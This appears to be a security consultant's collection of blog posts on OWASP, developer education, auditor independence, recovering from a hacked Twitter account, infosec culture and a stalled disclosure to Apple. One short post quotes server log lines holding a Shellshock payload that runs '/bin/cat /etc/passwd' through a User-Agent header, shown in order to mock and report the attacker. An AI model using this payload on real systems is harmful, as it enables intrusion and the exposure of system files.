Looking back at 2009 and Predictions for 2015

I looked back at the “predictions” for 2010, a post I wrote five years ago, and found that besides the dramatic increase in mobile assessments this last year or two, the things I was banging on about in 2009 are still issues today:

Developer education is woeful. I recently did an education piece for a developer crowd at a client, and only two of 30 knew what XSS was, and only one of them was aware of OWASP. At least at a University event I did later on in the year, about 20% of the students were aware of OWASP, XSS, SQL injection and security. The other 80% – not so much. I hope I reached them!

Agile security is woeful. When it first came out, I was enthralled by the chance for a SDLC to be secure by default because they wrote tests. Unfortunately, many modern day practitioners felt that all non-functional requirements were in the category of “you ain’t gonna need it“, and so the state of agile SDLC security is just abysmal. There are some shops that get it, but this year, I made the acquaintance of an organisation that prides themselves on being agile thought leaders who told our mutual client they don’t need any of that yucky documentation, up front architecture or design, or indeed any security stuff, such as constraints or filling in the back of the card with non-functional requirements.

Security conferences are still woeful. Not only is there a distinct lack of diversity in many conferences (zero women speakers at Ruxcon for example), very few have “how do we fix this?” talks. Take for example, the recent CCC event in Berlin. The media latched onto talks about biometric security failing (well, duh!) and SS7 insecurity (well, duh! if you’ve EVER done any telco stuff). Where are the talks about sending biometrics to the bottom of the sea with concrete shackles or replacing SS7 with something that the ITU hasn’t interfered with?

Penetration testing still needs to improve. I accept some of the blame here, because I was unable to change the market. They still sell really well. We really need to move on from pen tests as a wasted opportunity cost for actual security. We should be selling hybrid application verifications – code reviews with integrated pen tests to sort the exploitability of vulnerabilities properly. Additionally, the race to the bottom of the barrel with folks selling 1-2 day automated tests as equivalent to a full security verification for as little money as they can. We need a way of identifying weak tests from strong tests so the market can weed out useless checkbox testing. I don’t think red teaming is the answer as it’s a complete rod length check that can cause considerable harm unless performed with specific rules of engagement, that most red team folks would think invalidates a red team exercise.

Secure supply chain is still an incomplete problem. No progress at all since 2009. Until liability is reversed from the unique position that software – unlike all other goods and services is somehow special and needs special protection (which might have been true back in the 70’s during the home brew days), it’s not true today. We are outsourcing and out-tasking more and more every day, and unless the suppliers are required to uphold standard fit for purpose rules that all other manufacturers and suppliers have to do, we are going to get more and more breaches and end of company events. Just remember, you can outsource all you like,  but you can’t out source responsibility. If managers are told “it’s insecure” and take no or futile steps to remediate it, I’m sorry, but these managers are accountable and liable.

At least, due to the rapid adoption of JavaScript frameworks, we are starting to see a decline in traditional XSS. If you don’t know how to attack responsive JSON or XML API based apps and DOM injections, you are missing out on new style XSS. Any time someone tells you that security is hard to adopt because it requires so much refactoring, point them at any responsive app that started out life a long time ago. There’s way more refactoring in changing to responsive design and RESTful API than adding in security.

Again, due to the adoption of frameworks, such as Spring MVC and so on, we are starting to see a slight decline in the number of apps with CSRF and SQL injection issues. SQL injection used to be about 20-35% of all apps I reviewed in the late 2000’s, and now it’s fairly rare. That said, I’ve had some good times in 2014 with SQL injection.

The only predictions I will make for 2015 is a continued move to responsive design, using JavaScript frameworks for web apps, a concerted movement towards mobile first apps, again with a REST backend, and an even greater shift towards cloud, where there is no perimeter firewall. Given the lack of security architecture and coding knowledge out there, we really must work with the frameworks, particularly those on the backend like node.js and others, to protect front end web devs from themselves. Otherwise, 2015 will continue to look much like 2009.

So the best predictions are those you work on to fix. To that end, I was recently elected by the OWASP membership to the Global Board as an At Large member. And if nothing else – I am large!

  • I will work to rebalance our funding from delivering most of OWASP’s funds directly back to the members who are paying us a membership fee who then don’t spend the allocated chapter funds, but instead, become focussed on building OWASP’s relevance and future by spending around 30% building our projects, standards, and training, 30% on outreach, 30%  on membership, and 10% or less for admin overheads.
  • I will work towards ensuring that we talk to industry standards bodies and deal OWASP into the conversation. We can’t really complain about ISO, NIST, or ITU standards if they don’t have security SMEs to help draft these standards, can we?
  • I will work towards redressing the diversity both in terms of gender and region in our conferences, as well as working towards creating a speaker list so that developer conferences can look through to provide invited talks to great local appsec experts. We have so many great speakers with so much to say, but we have to get outside the echo chamber!
  • We have to increase our outreach to universities. We’ve lost the opportunity to train the folks who will become the lead devs and architects in the next 5-10 years, but we can work with the folks coming behind them. Hopefully, we can invest time and effort into addressing outreach to those folks already in the industry in senior/lead developer and architect and business analyst roles, but in terms of immediate bang for buck, we really need to address university level education to the few “ethical hacking” courses (which is a trade qualification), and work on building in security knowledge to the software engineers and comp sci students of the future. Ethical hacking courses have a place … for security experts, but for coders, they are a complete waste of time. Unless you are doing offensive security as your day job, software devs do not need to know how to discover vulnerabilities and code exploits, except in the most general of ways.

It’s an exciting time, and I hope to keep you informed of any wins in this area.

Independence versus conflict of interest in security reviews

I was giving a lecture to some soon to be graduating folks today, and at the end of the class, a student came up and said that he wasn’t allowed to work with auditors because “it was a conflict of interest”.

No, it’s not. And here’s why.

Conflict of interest

It’s only conflict of interest if a developer who wrote the code then reviews the code and declares it free of bugs (or indeed, is honest and declares it full of bugs). In either case, it’s self review, which is a conflict of interest.

The only way the auditor is in a conflict of interest is if the auditor reviews code they wrote. This is self-review.

An interesting corner case that requires further thought is a rare case indeed: I wrote or participated in a bunch of OWASP standards, some of which became bits of other standards and certifications, such as PCI DSS section 6.5. Am I self-reviewing if I reviewing code or applications against these standards?

I think not, because I am not changing the standard to suit the review (which is an independence issue),  and I’m not reviewing the standard (which would be self-review, which is a conflict of interest).

Despite this, for independance reasons where I think an independence in appearance issue might arise, I always put in that I created or had a hand in these various standards. Especially, if I recommend a client to use a standard that I had a hand in.

Independence

Independence is not just an empty word, it’s a promise to our clients that we are not tied to any particular vendor or methodology. We can’t be a trusted advisor if we’re a shill for a third party or are willing to compromise the integrity of review at a customer’s request.

The usual definition of independence is two pronged:

  • Independence in appearance.  If someone thinks that you might be compromised because of affiliations or financial interest, such as if you’ve previously held a job. For example, if you’ve always worked in incident response tool vendors, and then move to a security consultancy, you might feel you are independent, but others might perceive you as having a pro-IR toolset point of view.
  • Independance in actuality. If you own shares or get a financial reward for selling a product, any recommendation you make about recommending that product is suspect. This is the reason I want OWASP to remain vendor neutral.

If either of these prongs are violated, you are not independent. But just as humans are complex, there are many aspects to independence, and I’ve not learnt them all. I know most of the issues, been there got the t-shirt.

If you are independent, there are a few areas of independence that I refuse to relinquish (and I hope you do too!):

  • Scoping questions. I don’t mind customers setting a scope, but I will often argue for the correct scope before we start. Too narrow a scope can railroad a review into giving an answer the client wants, rather than a proper independent review.
  • Review performance independence. If the client tries to make the review so short that I can’t complete my normal review program in an effective manner or they stop me from getting the information I need, or tries to frame negative observations in a lesser or “meh” context, I will resist. I want to ensure that the review is accurate, but not at the expense of performing my methodology or being up to my usual standards.
  • Risk ratings and findings. In the last few years, I’ve had to resist folks trying to force real findings to become unrated opportunities for improvement (by definition all of my findings are such), or trying to reduce risk ratings by arguing with me, or getting words changed to suit a desired outcome. Again, I want the context to be accurate and I will listen to your input / arguments, but only I will write the report and set risk ratings. Otherwise, why bother hiring an external reviewer? You could write your own report set the ratings to suit. It doesn’t work that way.

Does independence always need to be achieved?

My personal view on this has changed over the years. I used to toe the strict party line on independence.

However, sometimes as a reviewer, you can be part of the solution. I personally believe that a good working relationship between the reviewer and the folks who produced the application or code is a good thing. Both parties can learn from working closely together, work out the best approach to resolving issues, and test it rapidly.

As long as the self-review aspect is properly managed, I believe this to be a good path forward. I don’t see this as being any different as a traditional review that recommends fix X, and then reviewing that X has been put into place. However, if the auditor is editing code, that has crossed the line.

Work with the business to document agreed rules of engagement early prior to work commencing. Both parties will get a lot more mileage from a closely cooperative review than a “pay someone to sit in the corner for two weeks” that is the standard fare of our industry.

Conclusion

Working together has obvious independance issues, particularly from an appearance point of view. So to the excellent question from a student today, working tightly with the auditors is not a conflict of interest, but it can be an independence issue if not properly managed by both the business and the reviewer.

Some people don’t get the hint

85.25.242.250 – – [28/Sep/2014:09:20:12 -0400] “GET / HTTP/1.1″ 301 281 “-” “() { foo;};echo;/bin/cat /etc/passwd”
85.25.242.250 – – [28/Sep/2014:22:30:48 -0400] “GET / HTTP/1.1″ 500 178 “-” “() { foo;};echo;/bin/cat /etc/passwd”

Dear very stupid attacker, you have the opsec of a small kitten who is surprised by his own tail. Reported.

So it’s finally happened

Passwords. Pah.

After running my blog on various virtual hosts and VPSs since 1998, my measures put into place to protect this site and the others on here were insufficient to protect against weak passwords.

Let’s just say that if you are a script kiddy and know all about press.php, tmpfiles.php and others, you have terrible operational security. There will be consequences. That is not a threat.

AppSec EU – DevGuide all day working party! Be a part of it!

Be a part of the upcoming AppSec EU in Cambridge!

Developer Guide Hackathon
Developer Guide Hackathon

 

* UPDATE! Eoin can’t be in two places at once, so our hack-a-thon has moved to Tuesday 24 June. Same room, same bat channel. *

Eoin Keary and myself will be running an all day working party on the Developer Guide On June 24 from 9 AM to 6 PM GMT. The day starts with Eoin giving a DevGuide status update talk, and then we get down with editing and writing. 

I will be working remotely from the end of Eoin’s talk to til 1 pm UK time, and I so I encourage everyone who has an interest in the Devguide to either attend the workshop in person, or consider helping out remotely. Sign up here!

https://www.owasp.org/index.php/Projects_Summit_2014/Working_Sessions/004

My goal is to get the entire text of the OWASP Developer Guide 2.0 ported to the new format at GitHub, and hopefully finish 4 chapters. To participate, you will need a browser and a login to GitHub. You will also probably want a login to Google+ so you can be a part of an “on air” all day hangout so you can ask me anything about the DevGuide, or just chill with other remote participants.

Stop. Just stop.

In the last few weeks, a prominent researcher, Dragos Ruiu (@dragosr) has put his neck out describing some interesting issues with a bunch of his computers. If his indicators of compromise are to be believed (and there is the first problem), we have a significant issue. The problem is the chorus of “It’s not real” “It’s impossible” “It’s fake” is becoming overwhelming without sufficient evidence one way or another. Why are so many folks in our community ready to jump on the negative bandwagon, even if they can’t prove it or simply don’t have enough evidence to say one way or another?

My issue is not “is it true” or “I think it’s true” or “I think it’s false”, it’s that so many info sec “professionals” are basically claiming:

  1. Because I personally can’t verify this issue is true, the issue must be false. QED.

This fails both Logic 101, class 1, and also the scientific method. 

This is not a technical issue, it’s a people issue.

We must support all of our researchers, particularly the wrong ones. This is entirely obvious. If we eat our young and most venerable in front of the world’s media, we will be a laughing stock. Certain “researchers” are used by their journalist “friends” to say very publicly “I think X is a fool for thinking that his computers are suspect”. This is utterly wrong, foolhardy, and works for the click bait articles the J’s write and on their news cycle, not for us.

Not everybody is a viable candidate for having the sample. In my view, the only folks who should have a sample of this thing are those who have sufficient operational security and budget to brick and then utterly destroy at least two or twenty computers in a safe environment. That doesn’t describe many labs. And even then, you should have a good reason for having it. I consider the sample described to needing the electronic equivalent of Level PC4 bio labs. Most labs are not PC4, and I bet most of infosec computing labs are not anywhere near capable of hosting this sample.

Not one of us has all of the skills required to look at this thing. The only way this can be made to work is by working together, pulling together E.Eng folks with the sort of expensive equipment only a well funded organisation or a university lab might muster, microcontroller freaks, firmware folks, CPU microcode folks, USB folks, file system folks, assembly language folks, audio folks, forensic folks, malware folks, folks who are good at certain types of Windows font malware, and so on. There is not a single human being alive who can do it all. It’s no surprise to me that Dragos has struggled to get a reproducible but sterile sample out. I bet most of us would have failed, too.

We must respect and use the scientific method. The scientific method is well tested and true. We must rule out confirmation bias, we must rule out just “well, a $0.10 audio chip will do that as most of them are paired with $0.05 speakers and most of the time it doesn’t matter”. I actually don’t care if this thing is real or not. If it’s real, there will be patches. If it’s not real, it doesn’t matter. I do care about the scientific method, and it’s lack of application in our research community. We aren’t researchers for the most part, and I find it frustrating that most of us don’t seem to understand the very basic steps of careful lab work and repeating important experiments.

We must allow sufficient time to allow the researchers to collaborate and either have a positive or negative result, analyse their findings and report back to us. Again, I come back to our journalist “friends”, who can’t live without conflict. The 24 hour news cycle is their problem, not our problem. We have Twitter or Google Plus or conferences. Have some respect and wait a little before running to the nearest J “friends” and bleating “It’s an obvious fake”.

We owe a debt to folks like Dragos who have odd results, and who are brave enough to report them publicly. Odd results are what pushes us forward as an industry. Cryptoanalysis wouldn’t exist without them. If we make it hard or impossible for respected folks like Dragos to report odd results, imagine what will happen the next time? What happens if it’s someone without much of a reputation? We need a framework to collaborate, not to tear each other down.

Our industry’s story is not the story about the little boy who cried wolf. We are (or should be) more mature than a child’s nursery rhyme. Have some respect for our profession, and work with researchers, not sully their name (and yours and mine) by announcing before you have proof that something’s not quite right. If anything, we must celebrate negative results every bit as much as positive results, because I don’t know about you, but I work a lot harder when I know an app is hardened. I try every trick in the book, including the stuff that is bleeding edge as a virtual masterclass in our field. I bet Dragos has given this the sort of inspection that only the most ardent forensic researcher might have done. If he hasn’t gotten that far, it’s either sufficiently advanced to be indistinguishable from magic, or he needs help to let us understand what is actually there. I bet that few of us could have gotten as far as Dragos has.

To me, we must step back, work together as an industry – ask Dragos: “What do you need?” “How can we help?” and if that’s “Give me time”, then let’s step back and give him time. If it’s a USB circuit analyser or a microcontroller dev system and plus some mad soldering skills, well, help him, not tear him down. Dragos has shown he has sufficient operational security to research another 12-24 months on this one. We don’t need to know now, now, or now. We gain nothing by trashing his name.

Just stop. Stop trashing our industry, and let’s work together.

So your Twitter has been hacked. Now what?

So I’m getting a lot of Twitter spam with links to install bad crap on my computer.

More than just occasionally, these DM’s are sent by folks in the infosec field. They should know better than to click unknown links without taking precautions.

So what do you need to do?

Simple. Follow these basic NIST approved rules:

Contain – find out how many of your computers are infected. If you don’t know how to do this, assume they’re all suspect, and ask your family’s tech support. I know you all know the geek in the family, as it’s often me.

Eradicate – Clean up the mess. Sometimes, you can just use anti-virus to clean it up, other times, you need to take drastic action, such as a complete re-install. As I run a Mac household with a single Windows box (the wife’s), I’m moderately safe as I have very good operational security skills. If you’re running Windows, it’s time for Windows 8, or if you don’t like Windows 8, Windows 7 with IE 10.

Recover – If you need to re-install, you had backups, right? Restore them. Get everything back the way you like it.

  • Use the latest operating system. Windows XP has six months left on the clock. Upgrade to Windows 7 or 8. MacOS X 10.8 is a good upgrade if you’re still stuck on an older version. There is no reason not to upgrade. On Linux or your favorite alternative OS, there is zero reason not to use the latest LTS or latest released version. I make sure I live within my home directory, and have a list of packages I like to install on every new Linux install, so I’m productive in Linux about 20-30 minutes after installation.
  • Patch all your systems with all of the latest patches. If you’re not good with this, enable automatic updates so it just happens for you automatically. You may need to reboot occasionally, so do so if your computer is asking you to do that. On Windows 8, it only takes 20 or so seconds. On MacOS X, it even remembers which apps and documents were open.
  • Use a safer browser. Use IE 10. Use the latest Firefox. Use the latest Chrome. Don’t use older browsers or you will get owned.
  • On a trusted device, preferably one that has been completely re-installed, it’s time to change ALL of your passwords as they are ALL compromised unless proven otherwise. I use a password manager. I like KeePass X, 1Password, and a few others. None of my accounts shares a password with any other account, and they’re all ridiculously strong. 
  • Protect your password manager. Make sure you have practiced backing up and restoring your password file. I’ve got it sprinkled around in a few trusted places so that I can recover my life if something bad was to happen to any single or even a few devices.
  • Backups. I know, right? It’s always fun until all your data and life is gone. Backup, backup, backup! There are great tools out there – Time Capsule for Mac, Rebit for Windows, rsync for Unix types.

Learn and improve. It’s important to make sure that your Twitter feed remains your Twitter feed and in fact, all of your other accounts, too.

I never use real data for questions and answers, such as my mother’s maiden name as that’s a public record, or my birth date, which like everyone else, I celebrate once per year and thus you could work it out if you met me even randomly at the right time of the year. These are shared knowledge questions, and thus an attacker can use that to bypass Twitter, Google’s and Facebook’s security settings. I either make it up or just insert a random value. For something low security like a newspaper login or similar, I don’t track these random values as I have my password manager to keep track of the actual password. For high value sites, I will record the random value to “What’s your favorite sports team”. It’s always fun reading out 25 characters of gibberish to a call centre in a developing country.

Last word

I might make a detailed assessment of the DM spam I’m getting, but honestly, it’s so amateur hour I can’t really be bothered. There is no “advanced” persistent threat here – these guys are really “why try harder?” when folks don’t undertake even the most basic of self protection.

Lastly – “don’t click shit“. If you don’t know the person or the URL seems hinky, don’t click it.

That goes double for infosec pros. You know better, or you will just after you click the link in Incognito / private mode. Instead, why not fire up that vulnerable but isolated XP throw away VM with a MITM proxy and do it properly if you really insist on getting pwned. If you don’t have time for that, don’t click shit.

Infosec apostasy

I’ve been mulling this one over for a while. And honestly, after a post to an internal global mail list at work putting forward my ideas, I’ve come to realise there are at least two camps in information security:

  • Those who aim via various usual suspects to protect things
  • Those who aim via various often controversial and novel means to protect people 

Think about this for one second. If your compliance program is entirely around protecting critical data assets, you’re protecting things. If your infosec program is about reducing fraud, building resilience, or reducing harmful events, you’re protecting people, often from themselves.

I didn’t think my rather longish post, which brought together the ideas of the information swarm (it’s there, deal with it), information security asymmetry and pets/cattle (I rather like this one), would land with the heavy thud akin to 95 bullet points nailed to the church door.

So I started thinking – why do people still promulgate stupid policies that have no bearing on evidence? Why do people still believe that policies, standards, and spending squillions on edge and end point protection when it is trivial to break it?

Faith.

Faith in our dads and grand dads that their received wisdom is appropriate for today’s conditions.

Si Dieu n’existait pas, il faudrait l’inventer” Voltaire

(Often mis-translated as “if religion did not exist, it would be necessary to create it”, but close enough for my purposes)

I think we’re seeing the beginning of infosec religion, where it is not acceptable to speak up against unthinking enforcement of hand me down policies like 30 day password resets or absurd password complexity, where it is impossible to ask for reasonable alternatives when you attempt to rule out the imbecilic alternatives like basic authentication headers.

We cannot expect everyone using IT to do it right, or have high levels of operational security. Folks often have a quizzical laugh at my rather large random password collection and use of virtual machines to isolate Java and an icky SOE. But you know what? When Linked In got pwned, I had zero fears that my use of Linked In would compromise anything else. I had used a longish random password unique to Linked In. So I could take my time to reset that password, safe in the knowledge that even with the best GPU crackers in existence, the heat death of the universe would come before my password hash was cracked. Plenty of time. Fantastic … for me, and I finally get a pay off for being so paranoid.

But… I don’t check my main OS every day for malware I didn’t create. I don’t check the insides of my various devices for evil maid MITM or keyloggers. Let’s be honest – no one but the ultra paranoid do this, and they don’t get anything done. But infosec purists expect everyone to have a bleached white pristine machine to do things – or else the user is at fault for not maintaining their systems.

We have to stop protecting things and start protecting humans, by creating human friendly, resilient processes with appropriate checks and balances that do not break as soon as a key logger or network sniffer or more to the point, some skill is brought to bear. Security must be agreeable to humans, transparent (as in plain sight as well as easy to follow), equitable, and the user has to be in charge of their identity and linked personas, and ultimately their preferred level of privacy.

I am nailing my colors to the mast – we need to make information technology work for humans. It is our creature, to do with as we want. This human says “no

Marketing – first against the wall when the revolution comes

A colleague of mine just received one of those awful marketing calls where the vendor rings *you* and demands your personal information “for privacy reasons” before continuing with the phone call.

*Click*

As a consumer, you must hang up to avoid being scammed. End of story. No exceptions.

Even if the business has a relationship with the consumer, asking them to prove who they are is wildly inappropriate. Under no circumstances should a customer be required to provide personal information to an unknown caller. It must be the other way around – the firm must provide positive proof of who they are! And by calling the client, the firm already knows who the client is, so there’s no reason for the client to prove who they are.

As a business, you are directly hurting your bottom line and snatching defeat from the jaws of victory by asking your customers to prove their identity to you.

This is about the dumbest marketing mistake ever – many customers will automatically assume (correctly in my view) that the campaign is a scam, and repeatedly hang up, thus lowering goal completion rates and driving up the cost of sales. Thus this dumb move can cost a company millions in opportunity costs in the form of:

  • wasted marketing (hundreds of dropped customer contacts for every “successful” completed sale),
  • increase fraud to the consumer and ultimately the business when customers reject fraudulent transactions
  • lose thousands if not hundreds of thousands of customers, and their ongoing and future revenue if they lose trust in the firm or by the firm’s lack of fraud prevention, cause them to suffer fraud by allowing scammers to easily harvest PII from the customer base and misuse it

Customers hate moving businesses once they have settled on a supplier of choice, but if you keep on hassling them the wrong way, they do up and leave.

So if any of you are in marketing or are facing pressure from the business to start your call script by asking for personally identifying information from your customers, you are training your customers to become victims of phishing attacks, which will cost you millions of dollars and many more lost customers than you’ll ever gain from doing the right thing.

It’s more than just time to change this very, very, very bad habit.

Responsible disclosure failed – Apple ID password reset flaw

Responsible disclosure is a double edged sword. The faustian bargain is I keep my mouth shut to give you time to fix the flaws, not ignore me. I would humbly suggest that it is very relevant to your interests when a top security researcher submits a business logic flaw to you that is trivially exploitable with just iTunes or a browser requiring no actual hacking skills.

If anyone knows anyone at Apple, please re-share or forward this post, and ask them to review my rather detailed description of my rather simple method of exploiting the Apple ID password reset system I submitted over six months ago with so far zero response beyond an automated reply. The report tracking number is #221529179 submitted August 12, 2012.

My issue should be fixed along with the other issues before they let password reset back online with my flaw intact.